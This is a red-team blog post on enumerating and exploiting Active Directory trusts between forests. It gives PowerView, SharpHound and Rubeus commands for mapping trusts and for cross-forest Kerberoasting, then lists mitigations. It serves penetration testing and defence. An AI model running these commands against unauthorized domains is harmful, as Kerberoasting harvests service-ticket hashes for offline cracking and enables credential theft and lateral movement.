← Back to posts
12 Feb 2026 Active Directory Red Team

Exploiting Active Directory Trust Relationships Across Forests

4mr
Amr En-Niari
@4mrr · 8 min read
Table of Contents

Introduction

Active Directory trust relationships are a powerful feature that enables resource sharing between domains and forests. However, when misconfigured, they become a significant attack vector for lateral movement and privilege escalation. In this post, we'll explore how to identify and exploit these relationships during red team engagements.

This post is based on real-world engagements and lab environments.

Understanding Trust Types

Before diving into exploitation, it's important to understand the different types of trusts that exist in Active Directory environments.

Parent-Child Trusts

These are automatically created when a new child domain is added to an existing domain tree. They are always two-way transitive trusts. 

# Enumerate trusts using PowerView
Get-DomainTrust
Get-DomainTrust -Domain child.corp.local

# Using AD Module
Get-ADTrust -Filter *
Get-ADTrust -Identity "child.corp.local"

Enumerating Trust Relationships

The first step is always enumeration. We need to identify what trusts exist, their direction, and whether SID filtering is enabled. 

# BloodHound collection
SharpHound.exe -c All,GPOLocalGroup --domain corp.local

# Map all trusts in the forest
Get-DomainTrustMapping

# Check SID filtering status
Get-DomainTrust | Select-Object SourceName,TargetName,TrustAttributes
Always verify your scope and authorization before performing trust enumeration in production environments.

Exploitation Techniques

Once we've mapped the trust relationships, several attack paths become available depending on the trust configuration.

Cross-Forest Kerberoasting

If a two-way trust exists between forests, we can request service tickets for SPNs in the target forest and attempt to crack them offline. 

# Kerberoast across trust
Rubeus.exe kerberoast /domain:target.local /dc:dc01.target.local

# Using PowerView
Get-DomainUser -SPN -Domain target.local | Get-DomainSPNTicket

Detection & Mitigation

As security consultants, we should always provide remediation recommendations. Key mitigations for trust abuse include enabling SID filtering, implementing selective authentication, and monitoring for cross-domain ticket requests.

The best defense against trust exploitation is the principle of least privilege — only create trusts that are absolutely necessary and restrict them as much as possible.
← All posts Next post →